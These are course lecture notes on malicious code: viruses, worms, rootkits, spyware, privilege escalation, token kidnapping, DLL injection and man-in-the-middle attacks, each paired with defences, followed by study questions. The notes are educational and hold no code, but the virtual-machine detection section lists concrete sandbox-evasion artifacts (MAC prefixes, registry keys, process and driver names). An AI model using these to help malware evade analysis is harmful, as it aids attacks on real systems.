UNIT-4

What Is Malicious Code?

• Malicious code is any type of code that causes harm to a computer system or
network. This includes viruses, worms, Trojan horses, ransomware, logic
bomb, and other malicious programs.
• Malicious code is the language used by threat actors to communicate with
computers.
• This code is used to manipulate the computers and make changes, often
leading to unauthorized access to a system.
• It then designs programming scripts – or “phrases” - to damage, alter, or
breach the network to create or exploit system vulnerabilities.
• Malicious code is used to craft numerous forms of malware, which can steal
data and gain unauthorized access to sensitive information, and is used to
carry out multiple cyber-attacks.
• Unfortunately, these attacks are easier to carry out as the malicious code
scripts can be re-used and automated. This allows widespread and faster
cyber-attacks to take place.
Types of malicious code

Many malicious code types can harm your computer by finding entry points that
lead to your precious data. Among the ever-growing list, here are some common
culprits.

Viruses

Viruses are self-replicating malicious code that attaches to macro-enabled

programs to execute. These files travel via documents and other file downloads,
allowing the virus to infiltrate your device. Once the virus executes, it can self-
propagate and spread through the system and connected networks.

Worms

Worms are also self-replicating and self-spreading code like viruses but do not
require any further action to do so. Once a computer worm has arrived on your
device, these malicious threats can execute entirely on their own — without any
assistance from a user-run program.

1
Trojans

Trojans are decoy files that carry malicious code payloads, requiring a user to use
the file or program to execute. These threats cannot self-replicate or spread
autonomously. However, their malicious payload could contain viruses, worms, or
any other code.

Cross-site scripting (XSS)

Cross-site scripting interferes with the user’s web browsing by injecting malicious
commands into the web applications they may use. This often changes web
content, intercepts confidential information, or serves an infection to the user’s
device itself.

Backdoor attacks

Application backdoor access can be coded to give a cybercriminal remote access to

the compromised system. Aside from exposing sensitive data, such as private
company information, a backdoor can allow an attacker to become an advanced
persistent threat (APT).

Cybercriminals can then move laterally through their newly obtained access level,
wipe out a computer's data, or even install spyware. These threats can reach a high
level: The U.S. Government Accountability Office has even warned about the
threat of malicious code against national security.

Examples of malicious code attacks

Malicious code can come in many forms and has been very active in the past.
Among the instances of these attacks, here are a few of the most well-known:

Emotet trojan

First appearing in 2014, the Emotet trojan evolved from its malware roots to
become email spam laden with malicious code. The attackers use phishing tactics
like urgent email subject lines (ex: "Payment Needed") to fool users into
downloads.

2
Once on a device, Emotet has been known to run scripts that deliver viruses, install
command and control (C&C) malware for botnet recruitment, and more. This
threat took a short break in 2018 before returning to become an SMS malware
threat in the process.

Stuxnet worm

Since 2010, the Stuxnet computer worm and its successors have been targeting
national infrastructure. Its first documented attack involved Iranian nuclear
facilities via USB flash drive, destroying critical equipment. Stuxnet has since
ceased, but its source code has been used to create similar highly targeted attacks
through 2018.

How to protect against malicious code attacks

For most malicious threats, antivirus software with automatic updates, malware
removal capabilities, web-browsing security is the best defense. However,
preventing malicious code may not be possible with antivirus software on its own.
Antivirus typically prevents and removes viruses and other forms of malware — or
malicious software — is a subcategory of malicious code. The broader category of
malicious code includes website scripts that can exploit vulnerabilities to upload
malware. By definition, not all antivirus protection can treat certain infections or
actions caused by malicious code.

While antivirus is still essential for proactive infection removal and defense, here
are some valuable ways to protect yourself:

• Install anti-scripting software to prevent JavaScript and related code from

running unauthorized.
• Exercise caution against links and attachments. Any message containing
URL links or attachments — whether by email or text message — can be a
vector for malicious code.
• Activate your browser’s popup blocker to prevent scripts from serving
malicious content in unwanted browser windows.
• Avoid using admin-level accounts for daily use. High-level permissions
are usually required to run scripts and programs automatically.
• Utilize data backups to protect irreplaceable files and documents.

3
 • Be wary of using any public data connection. USB connections are
generally overlooked but can easily harbor malicious code. Public Wi-Fi is
also a common threat that attackers can use to deliver malicious code.
• Use a properly configured firewall to block unauthorized connections. If
malicious code infiltrates your machine and connects outward to request
malware payloads, a firewall can help stop this. Be sure that your firewall is
configured to block by default and whitelist any expected and trusted
connections.
Privilege Escalation:

• Privilege escalation is a type of attack in which a malicious actor gains

higher-level access to a system or network than they are originally granted.
This could be either:
o Vertical Privilege Escalation: Gaining higher privileges, such as a
regular user becoming an administrator.
o Horizontal Privilege Escalation: Gaining access to the same level of
privilege but to other accounts or data.

Privilege escalation typically involves exploiting weaknesses in a system’s

configuration or vulnerabilities in software to increase access levels. For example,
a hacker might exploit a flaw in an operating system to elevate their access from a
standard user to an admin.

2. Obfuscation:

• Obfuscation in cybersecurity refers to techniques used to obscure or hide

the true purpose or nature of an action or data. This can be used both for
attacks (hiding malicious intent) or defenses (hiding the inner workings of
security measures).

In the context of cyberattacks, obfuscation is often used to:

• Mask the presence of malicious code or malware, making it harder to

detect by traditional security measures.
• Hide the attacker’s actions, such as obfuscating the commands or scripts
used during an attack to avoid detection by monitoring systems or logging
mechanisms.

Examples of obfuscation techniques in cyberattacks include:

4
 • Code obfuscation: Altering code to make it difficult for anyone reading the
code to understand its purpose. This is common in malware to prevent
reverse engineering.
• Encryption and tunneling: Masking data being transferred to avoid
detection by security systems (e.g., encrypting traffic or using
steganography).
• Obfuscating IP addresses or using tools like VPNs and proxies to hide the
attacker’s real location.

Combining Privilege Escalation and Obfuscation:

• In advanced attacks, privilege escalation may be paired with obfuscation to

make it harder for defenders to detect and respond to the attack.
• Once an attacker escalates their privileges, they may use obfuscation to hide
their tracks, making it more difficult for security tools to trace their actions.
• The goal is to maintain persistence and stealth, ensuring that the attacker
has continuous and undetected access to the compromised systems.

Defense Strategies:

• Detecting privilege escalation involves monitoring for unusual or

unauthorized attempts to gain higher privileges, auditing access logs, and
using techniques like least privilege (granting the minimum level of access
necessary).
• Obfuscation defenses include using anti-malware tools, performing code
review for security vulnerabilities, leveraging intrusion detection systems
(IDS), and employing behavioral analysis to detect abnormal activities that
might be hidden by obfuscation.

What is Virtual Machine Obfuscation?

VM obfuscation involves running malicious code or malware inside a virtual

machine to obscure its behavior, making it harder for security researchers, antivirus
software, or automated detection systems to analyze and detect the malicious
activity. The main goal is to make the code's execution difficult to reverse-engineer
or monitor in a standard environment.

5
Applications in Cybersecurity (Both Attacks and Defense)

1. Malicious Use of VM Obfuscation (Attacker’s Perspective)

• Evading Detection:
o VM obfuscation is commonly used by attackers to evade detection
during malware analysis. Security analysts may attempt to examine
suspicious code in a sandboxed environment, but if the malware
detects that it is being run in a virtual machine, it may not activate or
will only perform harmless actions, allowing the malware to slip past
the detection.
• Hiding Malware Behavior:
o Malicious actors may use VM obfuscation to keep the true nature of
their payload hidden from detection tools, which makes it harder for
security systems to analyze and understand the full scope of the
attack.
• Advanced Persistent Threats (APT):
o Advanced cybercriminal groups may leverage this technique to
maintain a foothold in a network while remaining undetected for long
periods, as their malware can be designed to blend into virtualized
environments, which are common in enterprise systems.

2. Defensive Use of VM (Security Researchers’ Perspective)

While attackers use VM obfuscation to hide their activities, defenders can also
leverage virtual machines to isolate threats and prevent them from spreading to real
systems. Some defensive applications include:

• Sandboxing:
o Security professionals use virtual machines to isolate and analyze
potentially harmful programs or suspicious files. By running these in a
VM, analysts can observe the behavior of malware without risking the
security of the actual operating system.
• VM Detection and Anti-VM Techniques:
o Defensive systems can also attempt to detect the use of VM
obfuscation by examining behaviors like anomalous CPU usage, file
access patterns, or system configurations that might indicate the
presence of a VM.

6
 o Some anti-virus programs may specifically look for signs of VM-
aware malware and block or flag suspicious activities that occur in
VM environments.

Persistent Software Techniques

Persistent software techniques in cybersecurity refer to methods that ensure the

continued presence, resilience, and long-term effectiveness of security measures,
malware, or defensive mechanisms. These techniques are used by both attackers
and defenders to maintain access, prevent detection, and sustain operational
capabilities. Here are key areas where persistence plays a role:

1. Attackers’ Persistent Techniques (Advanced Persistent Threats - APTs)

Attackers use various persistence techniques to maintain long-term access to

compromised systems, including:

• Rootkits & Bootkits – Modify operating system components to remain

hidden and persist across reboots.
• Registry Manipulation – Modify Windows registry keys to launch
malicious code upon startup.
• Scheduled Tasks & Services – Create scheduled tasks or system services
that execute automatically.
• DLL Injection & Process Hollowing – Inject code into legitimate
processes for stealth and persistence.
• Firmware & BIOS/UEFI Attacks – Modify firmware to survive OS
reinstallation.
• Backdoors & Remote Access Trojans (RATs) – Maintain a covert channel
for continued control.
• Living off the Land (LotL) Techniques – Abuse built-in system utilities
(like PowerShell, WMI) to avoid detection.

2. Defensive Persistent Techniques

Defenders also use persistence techniques to ensure ongoing security and

resilience:

• Endpoint Detection & Response (EDR) Solutions – Continuously monitor

and analyze system behavior.

7
 • Self-Healing Security Mechanisms – Automatically restore security
configurations and files.
• Memory Integrity & Kernel Protection – Prevent unauthorized code
execution at the OS level.
• Behavioral Anomaly Detection – Persistent monitoring of system behavior
for anomalies.
• Threat Hunting & Cyber Deception – Deploy honeypots and deception
techniques to lure attackers.
• Zero Trust Architecture – Persistent verification of users, devices, and
network activities.

3. Persistence in Secure Software Development

Developers implement persistence techniques to enhance the security of software

applications:

• Secure Code Practices – Implement secure coding standards to resist

persistent threats.
• Code Obfuscation & Anti-Tampering – Prevent reverse engineering and
modification.
• Software Updates & Patch Management – Ensure consistent updates to
mitigate vulnerabilities.
• Application Sandboxing – Isolate applications to prevent persistent
malware infections.

Rootkits

A rootkit is a type of malicious software (malware) designed to gain unauthorized

access to a computer system while remaining undetected. Rootkits allow attackers
to take control of a system, modify files, steal data, and bypass security measures.

Types of Rootkits

Rootkits can be categorized based on their level of access and functionality:

1. Kernel-mode Rootkits – Operate at the operating system’s core (kernel

level), making them very difficult to detect and remove.
2. User-mode Rootkits – Operate at the application level, intercepting system
calls and altering user applications.

8
 3. Bootkit – Infects the bootloader, allowing it to execute before the operating
system loads.
4. Firmware Rootkits – Reside in firmware (such as BIOS or UEFI), making
them persistent even after reinstallation of the OS.
5. Hypervisor Rootkits – Run below the OS by taking control of the system’s
hypervisor, allowing them to manipulate the OS.
6. Memory Rootkits – Reside in system RAM and do not leave traces on the
hard drive, making them harder to detect.

How Rootkits Work

• Exploit system vulnerabilities to gain privileged access.

• Modify system files, drivers, or registry entries.
• Hide processes, files, and network connections from security tools.
• Allow remote attackers to control the system.

Detection & Removal

Rootkits are hard to detect because they hide deep within the system. However,
detection methods include:

• Behavior analysis – Identifying unusual system behavior.

• Signature-based detection – Using antivirus and anti-rootkit tools.
• Memory forensics – Analyzing RAM for hidden processes.
• Boot-time scanning – Detecting rootkits before they activate.

Removing rootkits is challenging and often requires:

• Specialized anti-rootkit tools (e.g., GMER, RootkitRevealer).

• Booting into a clean OS to delete infected files.
• Reinstalling the operating system or flashing firmware.

Spyware in Cybersecurity

Spyware is a type of malicious software (malware) designed to secretly monitor

and collect information from a device without the user's consent. It operates
stealthily, often running in the background to gather sensitive data such as
passwords, browsing habits, keystrokes, and personal information.

9
Types of Spyware

Spyware can be classified based on its purpose and behavior:

1. Keyloggers – Record every keystroke made by the user, capturing login

credentials, credit card numbers, and other sensitive data.
2. Adware – Tracks user activity to display targeted advertisements,
sometimes slowing down the system.
3. Trojans – Spyware disguised as legitimate software, often allowing hackers
to access and control infected devices remotely.
4. System Monitors – Record user activity, including websites visited, emails
sent, and applications used.
5. Tracking Cookies – Monitor web browsing activities to collect marketing
data, often used for advertising purposes.
6. Banking Trojans – Specifically designed to steal financial information such
as online banking credentials.

How Spyware Infects Devices

Spyware can be installed in various ways, including:

✔ Malicious Email Attachments – Clicking on infected links or downloading
malicious attachments.
✔ Free Software & Fake Updates – Bundled with freeware or cracked software.
✔ Compromised Websites – Exploiting browser vulnerabilities.
✔ Drive-by Downloads – Automatically installed when visiting infected
websites.
✔ Phishing Attacks – Trick users into installing spyware through fake messages.

Detection & Removal

✔ Anti-Spyware & Antivirus Software – Use tools like Malwarebytes, Windows

Defender, or Spybot Search & Destroy.
✔ Task Manager Check – Identify unknown processes running in the
background.
✔ Monitor Network Activity – Check for unusual data transmissions.
✔ Safe Mode Scans – Boot into Safe Mode and run a full system scan.
✔ Reset Browsers & OS – Remove suspicious extensions or, in severe cases,
reinstall the operating system.

10
Attacks Against Privileged User Accounts & Privilege Escalation

Privileged user accounts have higher access rights than regular accounts,
allowing them to manage critical systems, change security settings, and access
sensitive data. Cybercriminals target these accounts to gain unauthorized control
over a system.

1. Attacks Against Privileged User Accounts

These attacks focus on stealing credentials, bypassing security measures, and

misusing high-privilege access. Common attack methods include:

A. Credential Theft Attacks

Phishing – Deceiving users into revealing credentials via fake emails or websites.
Keylogging – Capturing keystrokes to steal usernames and passwords.
Credential Dumping – Extracting stored credentials from memory using tools
like Mimikatz.
Brute Force & Password Spraying – Repeatedly guessing passwords until
access is granted.

B. Exploiting Weak Authentication

Default Credentials – Many systems come with default admin passwords

that attackers exploit.
Weak Passwords – Easily guessable or reused passwords make attacks
easier.
Lack of Multi-Factor Authentication (MFA) – Without MFA, a stolen
password is enough for access.

C. Insider Threats

Disgruntled Employees – Current or former employees misusing privileged

access.
Social Engineering – Tricking employees into granting access.

11
D. Malware & Ransomware

Remote Access Trojans (RATs) – Attackers use RATs to take control of

admin accounts.
Rootkits – Hide malicious activities and allow attackers to operate
undetected.

2. Privilege Escalation Attacks

Once attackers gain access to a system, they attempt to increase their privileges to
take full control.

A. Types of Privilege Escalation

1. Vertical Privilege Escalation (Privilege Elevation) – A lower-privilege

user (or attacker) gains admin or root privileges.
2. Horizontal Privilege Escalation – An attacker moves between user
accounts at the same privilege level to access restricted data.

B. Common Privilege Escalation Techniques

• Exploiting Vulnerabilities – Attackers use OS and software flaws to

escalate privileges.
• Token Impersonation – Gaining access by hijacking authentication tokens.
• DLL Injection & Hijacking – Running malicious code by tricking the
system into loading a fake Dynamic Link Library (DLL).
• Scheduled Task Exploitation – Modifying system tasks to execute
malicious commands with elevated privileges.
• Kernel Exploits – Taking advantage of vulnerabilities in the operating
system kernel.

Token Kidnapping in Cybersecurity

Token Kidnapping is a type of privilege escalation attack where an attacker

hijacks a user's security token to execute processes with higher privileges. This
technique allows attackers to impersonate privileged users, such as administrators
or system accounts, to perform unauthorized actions.

1. Understanding Security Tokens

12
A security token in Windows represents a user's authentication and privileges.
When a user logs in, the system assigns a token that determines what resources and
actions the user can access. Tokens are crucial for maintaining security and access
control.

Types of Tokens:

• Primary Token – Assigned when a user logs in and used for authentication.
• Impersonation Token – Allows a process to act on behalf of another user
temporarily.

2. How Token Kidnapping Works

Attack Steps:

1. Gain Initial Access – The attacker compromises a system using malware,

exploits, or credential theft.
2. Locate a Process Running with Higher Privileges – Common targets
include services running as SYSTEM or an administrator.
3. Hijack the Token – The attacker injects or manipulates an impersonation
token to act as a privileged user.
4. Execute Malicious Actions – The attacker gains administrative access to
install malware, disable security tools, or escalate privileges further.

3. Techniques Used in Token Kidnapping

• Impersonation Token Abuse – Attackers force a lower-privilege process to

adopt a privileged token.
• Token Duplication & Theft – Tools like Mimikatz can extract tokens and
reuse them.
• DLL Injection & Process Hollowing – Injecting code into a legitimate
high-privileged process.
• Scheduled Tasks Exploitation – Running tasks under SYSTEM privileges.

4. Real-World Example

In Windows XP and Server 2003, a vulnerability allowed non-admin users to

hijack impersonation tokens from privileged system services. Microsoft addressed
this in later versions, but attackers still find ways to exploit token abuse techniques
on unpatched systems.

13
Virtual Machine (VM) Detection in Cybersecurity

Virtual Machine Detection refers to techniques used to determine whether a

system is running in a virtualized environment such as VMware, VirtualBox, or
Hyper-V. This is often used by malware, anti-cheat software, and security tools
for various purposes.

1. Why Detect Virtual Machines?

A. Malware Perspective

Cybercriminals use VM detection to:

✔ Evade Detection – Malware avoids execution in VM environments used by
security researchers and sandboxes.
✔ Prevent Reverse Engineering – Attackers use VM detection to stop
researchers from analyzing malicious code.
✔ Target Real Systems – Some malware executes only on physical machines to
avoid automated analysis.

B. Security & Software Perspective

✔ Anti-Cheat & Digital Rights Management (DRM) – Prevents virtualized

environments from being exploited to bypass software restrictions.
✔ Software Licensing Protection – Ensures software is not being run on multiple
cloned virtual machines.
✔ Forensic Analysis & Penetration Testing – Determines if a system is running
in a VM to adjust attack strategies.

2. Methods of Virtual Machine Detection

A. Hardware & Processor Checks

• CPUID Instruction – Queries the CPU for virtualization extensions like

Intel VT-x or AMD-V.
• BIOS/UEFI Vendor Checks – Virtual machines often have BIOS values
like "VMware" or "VirtualBox."
• MAC Address Detection – Virtual NICs have specific MAC address
prefixes (e.g., VMware uses 00:05:69 and 00:0C:29).

14
B. Software & System Artifacts

• Registry Keys & Files – Virtual machines store identifiable files and
registry entries (e.g., HKLM\SOFTWARE\VMware, Inc.).
• Running Processes & Services – VM-related processes like
VBoxService.exe or vmtoolsd.exe indicate virtualization.
• Filesystem & Drivers – Searching for drivers like vboxguest.sys or
vm3dmp.sys reveals VM presence.

C. Timing & Performance Analysis

• Execution Timing Differences – VMs introduce latency, making operations

like CPU cycles slower.
• Clock Drift Analysis – Comparing timestamps from different sources can
reveal inconsistencies due to virtualization.

D. Interaction-Based Detection

• Mouse & Keyboard Behavior – Some malware detects scripted inputs

commonly used in VM-based analysis.
• Screen Resolution & Graphics Capabilities – VMs often use lower
resolutions and lack GPU acceleration.

Stealing Information and Exploitation

What is stealing information?

• Data theft is the act of stealing information stored on corporate databases,

devices, and servers.
• This form of corporate theft is a significant risk for businesses of all
sizes and can originate both inside and outside an organization.
• The term data theft can give the impression that this kind of breach is based
on malicious intent, but this is not always the case: data theft can also be an
unintentional act.
• An employee may, for example, take home information on an unsecured flash drive or
retain access to information after their contract has ended.
• The malicious theft of employee data often occurs without the victims ever
knowing about it, as a result of their accounts or personal devices being

15
 compromised by hackers capitalizing on poor password management or
unsecure networks.
• Bad actors that gain access to companies’ systems can lurk inside networks,
pretending to be a legitimate user for days, weeks, or years.
• By remaining undetected, they can gain additional access rights to
increasingly sensitive corporate datasets and pose a growing threat to
unaware businesses.
Exploitation Techniques in Cybersecurity

Exploitation in cybersecurity refers to the use of various methods to take advantage

of system vulnerabilities, software flaws, or human weaknesses to gain
unauthorized access, steal data, or manipulate system behavior. Below are four key
exploitation techniques:

1. Form Grabbing

Definition:

Form grabbing is a technique used by cybercriminals to intercept data entered into

web forms before it is transmitted over the network. Unlike keyloggers that record
keystrokes, form grabbers capture the data at the application level.

How It Works:

• A malicious program, often a Trojan or browser malware, hooks into the

browser.
• When a user enters credentials (e.g., usernames, passwords, credit card
details) into a web form, the malware captures the data before encryption.
• The stolen data is sent to the attacker, bypassing secure connections like
HTTPS.

Examples:
• Zeus Trojan (targets banking credentials).
• SpyEye (steals login details and personal data).

Prevention Measures:
• Use antivirus and anti-malware software.
• Enable multi-factor authentication (MFA).
• Use password managers to autofill credentials securely.
16
 • Monitor network traffic for suspicious activities.
2. Man-in-the-Middle (MitM) Attacks

Definition:

A Man-in-the-Middle attack occurs when an attacker secretly intercepts and alters

communication between two parties.

How It Works:

• The attacker positions themselves between the victim and a legitimate server
or user.
• They can eavesdrop, modify, or steal sensitive data.
• Often used over insecure Wi-Fi networks or via compromised routers.

Types of MitM Attacks:

• Session Hijacking – Stealing session cookies to take over an active user
session.
• HTTPS Spoofing – Tricking users into believing they are on a secure site.
• Wi-Fi Eavesdropping – Setting up rogue Wi-Fi hotspots to capture traffic.
• DNS Spoofing – Redirecting users to fake websites by altering DNS
responses.
Prevention Measures:
• Use VPNs when on public Wi-Fi.
• Always check for HTTPS in website URLs.
• Enable end-to-end encryption for messaging and communication.
• Use secure DNS services like Cloudflare or Google DNS.

3. DLL Injection

Definition:

DLL (Dynamic Link Library) Injection is a technique where an attacker injects

malicious code into a legitimate process by loading a rogue DLL file.

How It Works:

• Attackers force a legitimate process (e.g., a browser or system service) to

load a malicious DLL.
17
 • The rogue DLL executes commands with the same privileges as the
legitimate application.
• This allows attackers to manipulate system processes, bypass security
software, or steal data.

Common Uses:

• Privilege Escalation – Gaining higher-level system access.

• Keylogging – Capturing user input via injected DLLs.
• Backdoor Creation – Establishing persistent remote access.

Examples:

• TrickBot (a banking malware that uses DLL injection).

• Cobalt Strike (penetration testing tool, often abused by attackers).

Prevention Measures:
• Enable DLL verification to prevent unauthorized DLL loading.
• Monitor system processes for unusual behavior.
• Use endpoint protection to detect DLL injection attempts.
• Implement application whitelisting to allow only trusted DLLs.

Assignment Questions
1. Compare and contrast worms and viruses in terms of propagation, impact, and
real-world examples. How have these evolved over time?
2. What are rootkits, and how do they alter the system to hide their presence?

3. Describe the workings of a man-in-the-middle (MITM) attack. How can

attackers use this to intercept sensitive information?

4.Explain DLL Injection. What are its implications in process hijacking?

5. What is token kidnapping in Windows systems? How does it enable privilege

escalation?

Tutorial Questions

1. What is the primary difference between a worm and a virus?

18
2 Define obfuscation in the context of malware.

3 What is a rootkit, and why is it difficult to detect?

4 What does token kidnapping exploit in Windows?

5 How can DLL injection be detected by antivirus or endpoint protection

software?

6 True/False: BHOs are only used by legitimate software like toolbars and cannot
be malicious.

7 What is virtual machine detection, and why would malware avoid execution in
VMs?

19